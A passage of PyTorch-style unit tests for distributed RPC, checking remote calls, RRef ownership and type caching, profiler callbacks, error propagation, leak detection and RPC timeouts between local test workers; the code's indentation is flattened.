outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
expected_inner_events = ['aten::sub']
expected_outer_events = expected_inner_events + ['aten::add']
self._assert_top_level_events(inner_events, expected_inner_events)
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, expected_outer_events)
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with _profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with _profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
# This barrier prevents a race condition where the main thread exits
            # context manager before the remote function has run.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
self._nested_rpc(nested_rpc, torch.ones(2, 2) + 1)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_builtin_remote_ret(self):
self._builtin_remote_ret(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@dist_init
def test_builtin_remote_self(self):
self._builtin_remote_self(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
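    # Positional-argument factory passed to _test_multi_remote_call as args_fn;
    # returns a pair of dense or sparse tensors depending on the sparse flag.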
@staticmethod
def _multi_args_fn(n, sparse=False):
if sparse:
return (build_sparse_tensor(), build_sparse_tensor())
else:
return (torch.ones(n, n), torch.ones(n, n))
@dist_init
def test_multi_builtin_remote_ret(self):
self._test_multi_remote_call(
torch.add, False,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@staticmethod
def _multi_kwargs_fn(n, sparse=False):
if sparse:
return {
"a": build_sparse_tensor(),
"b": build_sparse_tensor(),
"c": build_sparse_tensor()
}
else:
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
@dist_init
def test_multi_py_udf_remote(self):
self._test_multi_remote_call(
my_function,
False,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_py_rref_args(self):
self._py_rref_args(
torch.ones(2, 2),
1,
torch.ones(2, 2),
2,
torch.ones(2, 2) * 2 + 3)
@dist_init
def test_py_rref_args_user_share(self):
self._py_rref_args_user_share(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_py_rpc_rref_args(self):
self._py_rpc_rref_args(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_nested_remote(self):
self._nested_remote(
nested_remote,
torch.ones(2, 2) + 3
)
@dist_init
def test_nested_rref(self):
self._nested_rref(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_nested_rref_stress(self):
self._nested_rref_stress(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
        # Otherwise, some peer could exit early, leaving others to hit timeout
        # errors or connection closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
        # Ensure that an error is raised if a user tries to call
        # local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
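    # _get_type should issue exactly one RPC to the owner on the first call and
    # serve subsequent calls from a cache: with blocking=False repeated calls
    # return the same cached future, and no additional _rref_typeof_on_owner
    # RPC shows up in the profiler.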
@dist_init
def _test_rref_type(self, blocking):
def launched_rpc(events):
expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
            return any(e.name.startswith(expected_name) for e in events)
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with _profile() as p:
t = rref._get_type(blocking=blocking)
if not blocking:
t = t.wait()
self.assertTrue(launched_rpc(p.function_events))
expected_type = type(torch.ones(2))
self.assertEqual(t, expected_type)
futs = []
def verify(fut):
self.assertEqual(fut.value(), expected_type)
with _profile() as p:
for _ in range(10):
t = rref._get_type(blocking=blocking)
if not blocking:
futs.append(t)
t.add_done_callback(verify)
t = t.wait()
self.assertEqual(t, expected_type)
if not blocking:
# Note that cached calls with blocking=False all return the same
# cached original future.
first_fut = futs[0]
for f in futs[1:]:
self.assertTrue(f is first_fut)
# Ensure we never launch another RPC, other than for the very
# first call.
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
dst = worker_name((self.rank + 1) % self.world_size)
        # raise_func fails on the owner; _get_type should surface that error.
rref = rpc.remote(dst, raise_func)
# Blocking: error raised inline
if blocking:
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type(blocking=blocking)
else:
# Non-blocking: Immediately return future, block on wait
fut = rref._get_type(blocking=blocking)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def test_rref_type_with_error_blocking(self):
self._test_rref_type_with_error(blocking=True)
def test_rref_type_with_error_non_blocking(self):
self._test_rref_type_with_error(blocking=False)
@dist_init
def _test_rref_type_owner(self, blocking):
rref = RRef(torch.ones(2) + 1)
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, type(torch.ones(2)))
rref = RRef(MyClass(0))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_owner_blocking(self):
self._test_rref_type_owner(blocking=True)
def test_rref_type_owner_non_blocking(self):
self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
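    # Locally created RRefs are owned by this worker, while remotely created
    # ones are owned by the destination worker; owner() results must compare
    # and hash accordingly, so the dict below collapses to one entry per
    # distinct owner.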
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
        Tests that it is possible to call an instance method on a remote object
        by using rref.owner() as the destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on remote end
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we would need barrier before and after every check.
# The barrier before the check makes sure that all previous states are
        # cleared globally, and the barrier after ensures that no subsequent
        # state change leaks into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# RRef on local value is not added to context until shared across RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Wait for owner rref to be cleared.
while int(info["num_owner_rrefs"]) != 0:
info = _rref_context_get_debug_info()
time.sleep(0.1)
dist.barrier()
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
        # Test that rpc.enable_gil_profiling(False) will result in
# GIL wait time not being recorded.
# GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# only test keys in this test case. Values should be covered by
# individual module debug info tests
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in python 3.6+. So here, we
# manually check keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can timeout since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
# These futures should time out and be marked with an exception indicating the timeout.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
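# NB: a minimal sketch (not collected as a test) of the timeout precedence the
# tests above and below rely on; it assumes RPC is already initialized and
# reuses the module-level `rpc`, `torch`, and `worker_name` helpers of this file.
def _timeout_precedence_sketch(self, dst):
    rpc._set_rpc_timeout(1)  # 1 second process-wide default
    rpc.rpc_sync(dst, torch.add, args=(torch.ones(1), 1))             # uses the 1s default
    rpc.rpc_sync(dst, torch.add, args=(torch.ones(1), 1), timeout=5)  # per-call timeout wins
    rpc.rpc_sync(dst, torch.add, args=(torch.ones(1), 1), timeout=0)  # 0 disables the timeout
    # Restore the default so shutdown messages can process cleanly.
    rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)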
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure the RPC runs to completion when no per-call timeout is passed and
# the default RPC timeout is used.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure the RPC runs to completion when no per-call timeout is passed and
# the default RPC timeout is used.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
